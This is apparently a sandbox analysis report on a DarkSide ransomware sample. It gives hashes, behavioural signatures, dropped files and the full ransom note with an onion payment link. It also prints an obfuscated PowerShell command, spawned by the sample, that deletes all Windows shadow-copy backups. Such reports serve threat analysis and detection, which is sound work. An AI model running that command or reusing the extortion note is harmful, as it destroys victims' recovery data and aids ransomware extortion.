Resubmissions

28-07-2024 16:38

240728-t5tryssgmm 10

07-07-2024 14:07

240707-rfgd8atekm 10

07-07-2024 14:07

240707-re689awdpe 10

13-09-2022 17:54

220913-wg1lpsgbg7 10

Analysis

  • max time kernel
    1561s
  • max time network
    1567s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    07-07-2024 14:07

General

  • Target

    RansomwareSamples/DarkSide_16_01_2021_59KB.exe

  • Size

    59KB

  • MD5

    0ed51a595631e9b4d60896ab5573332f

  • SHA1

    7ae73b5e1622049380c9b615ce3b7f636665584b

  • SHA256

    243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60

  • SHA512

    9bfd6318b120c05d9a42a456511efc59f2be5ad451baa6d19d5de776e2ff74dbee444c85478ee7cfdbf705517cc147cd64c6814965f76c740fe1924594a37cb5

  • SSDEEP

    768:vjjmbIax7F3DS4/S9+CuUSbVAdNcxGV1yl3RYY23W58:0x7Fu4/ihrhDTV1ylhZ58

Malware Config

Extracted

Path

C:\Users\Admin\README.a8e86c8e.TXT

Family

darkside

Ransom Note
----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW When you open our website, put the following data in the input form: Key: 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!
URLs

http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW

Signatures

  • DarkSide

    Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.

  • Renames multiple (179) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Modifies Control Panel 1 IoCs
  • Modifies registry class 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe
    "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe"
    1⤵
    • Sets desktop wallpaper using registry
    • Modifies Control Panel
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2656
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2684
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2976

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    febf5feaf0f1361b17ccb6b16e2ffa52

    SHA1

    a78bf2f756b27e0434d204ad58e1eb51ad1e6998

    SHA256

    bc0cdc708a1678f40a3ba3334aaeafdcb4b0465a760b83fb39e06eba415c7c83

    SHA512

    822271f8f733e6ebbe224b45ce590e5b1e1ffd331825b2c986c23adf7d4a8e387473463f2b9722f9ab4c9064a78f513d1648d0f5ada7c1cbf0199ca41924d493

  • C:\Users\Admin\README.a8e86c8e.TXT

    Filesize

    1KB

    MD5

    d4e176b40c4ea17f4870c34fad926d6e

    SHA1

    2cc3e4c6cf00e4a2ac0e16e9f7b0ccf2421b92e0

    SHA256

    7ee422c323ddbda59934ed7bfa6217cfe06bdb50165b7d4b6115475f1df7af0c

    SHA512

    feaa913ae99db210db088423a9813e1efedd89d80817bf485a4d9f8ea349b86932ac16ba0473bd224ff150603507bd289d01aebc1a702372a076a167b632f471

  • memory/2684-5-0x000007FEF665E000-0x000007FEF665F000-memory.dmp

    Filesize

    4KB

  • memory/2684-6-0x000000001B600000-0x000000001B8E2000-memory.dmp

    Filesize

    2.9MB

  • memory/2684-7-0x0000000002240000-0x0000000002248000-memory.dmp

    Filesize

    32KB

  • memory/2684-8-0x000007FEF63A0000-0x000007FEF6D3D000-memory.dmp

    Filesize

    9.6MB

  • memory/2684-9-0x000007FEF63A0000-0x000007FEF6D3D000-memory.dmp

    Filesize

    9.6MB

  • memory/2684-10-0x000007FEF63A0000-0x000007FEF6D3D000-memory.dmp

    Filesize

    9.6MB

  • memory/2684-11-0x000007FEF63A0000-0x000007FEF6D3D000-memory.dmp

    Filesize

    9.6MB

  • memory/2684-12-0x000007FEF63A0000-0x000007FEF6D3D000-memory.dmp

    Filesize

    9.6MB

  • memory/2684-13-0x000007FEF63A0000-0x000007FEF6D3D000-memory.dmp

    Filesize

    9.6MB